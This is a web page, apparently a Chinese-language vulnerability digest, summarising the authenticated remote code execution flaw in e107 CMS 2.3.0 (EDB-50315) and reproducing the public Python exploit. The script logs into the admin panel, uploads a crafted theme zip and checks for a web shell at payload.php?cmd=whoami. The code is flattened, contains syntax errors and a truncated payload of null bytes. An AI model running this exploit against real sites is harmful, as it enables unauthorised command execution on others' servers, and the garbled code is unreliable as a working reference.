e107 CMS 2.3.0 Authenticated RCE Vulnerability (EDB-50315) with Exploit Code

e107 CMS 2.3.0 远程代码执行漏洞 (RCE) 总结 漏洞概述 漏洞名称: e107 CMS 2.3.0 - 远程代码执行 (RCE) (Authenticated) EDB-ID: 50315 发布日期: 2021-09-22 漏洞类型: Webapps 平台: PHP 利用条件: 需要认证权限 (Authenticated)，且主题页面配置不当导致安全漏洞。 影响范围 受影响软件: e107 CMS 受影响版本: 2.3.0 测试环境: Linux/Windows 修复方案 页面未提供具体的官方补丁链接，建议联系软件供应商或升级至安全版本。 注意配置主题页面权限，避免安全漏洞。 POC/Exploit 代码 ```python #!/usr/bin/env python3 Exploit Title: e107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated) Date: 21-09-2021 Exploit Author: Halit AKAYDIN (hLTakydN) Vendor Homepage: https://e107.org/ Software Link: https://e107.org/download Version: 2.3.0 Category: Webapps Tested on: Linux/Windows e107 is a free website content management system Includes an endpoint that allows remote access Theme page is misconfigured, causing security vulnerability User information with sufficient permissions is required. The contents of the upload "malicious.zip" file must be too long to read to bypass some security measures! import requests import argparse import sys parser = argparse.ArgumentParser(description='e107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)') parser.add_argument('-u', '--host', type=str, required=True) parser.add_argument('-l', '--login', type=str, required=True) parser.add_argument('-p', '--password', type=str, required=True) args = parser.parse_args() print("[] e107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)\n", "[] Exploit Author: Halit AKAYDIN (hLTakydN)\n") host = args def check_args(): #Check http or https if args.host.startswith(('http://', 'https://')): print('[+] Check URL...\n') sleep(2) args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] else: pass else: print('[\n!] Check Address...\n') sleep(2) args.host = "http//" + args.host args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] else: pass Check Host Status try: response = requests.get(args.host) if response.status_code != 200: print('[!] Address not reachable!') sleep(2) exit(1) else: check_args() except requests.ConnectionError as exception: print('[!] Address not reachable!') sleep(2) exit(1) def check_args(): response = requests.get(args.host + "/e107_themes/payload/payload.php?cmd=whoami") if response.status_code == 200: print('[+] Exploit File Exists!\n') sleep(2) exploit(args) else: login(args) def login(args): url = args.host + "/e107_admin/admin.php" headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": args.host, "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/e107_admin/admin.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } data = {"authname": args.login, "authpass": args.password, "authsubmit": "Log In"} response = requests.post(url, headers=headers, data=data, allow_redirects=False) new_cookie = response.cookies.get("My51_cookieSID") if response.headers.get("Location") == "admin.php?failed": print('[!] Login Failed...\n') print('Your username or password is incorrect.') sleep(2) exit(1) else: print('[+] Success Login...\n') sleep(2) install(args, new_cookie) def install(args, new_cookie): url = args.host + "/e107_admin/theme.php?mode=main&action=upload" cookies = { "My51_cookieSID": new_cookie, "e107_tzOffset": "-180" } headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": args.host, "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/e107_admin/theme.php?mode=main&action=upload", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } data = "------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n2097152\r\n\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"a01\"\r\n\r\n0\r\n\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"file_userfile[]\"; filename=\"payload.zip\"\r\nContent-Type: application/zip\r\n\r\nPK\x03\x04\x14\x00\x00\x00\x08\x00\x00\x00!\x00\x55\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\

Goal Reached Thanks to every supporter — we hit 100%!

e107 CMS 2.3.0 Authenticated RCE Vulnerability (EDB-50315) with Exploit Code

More from this source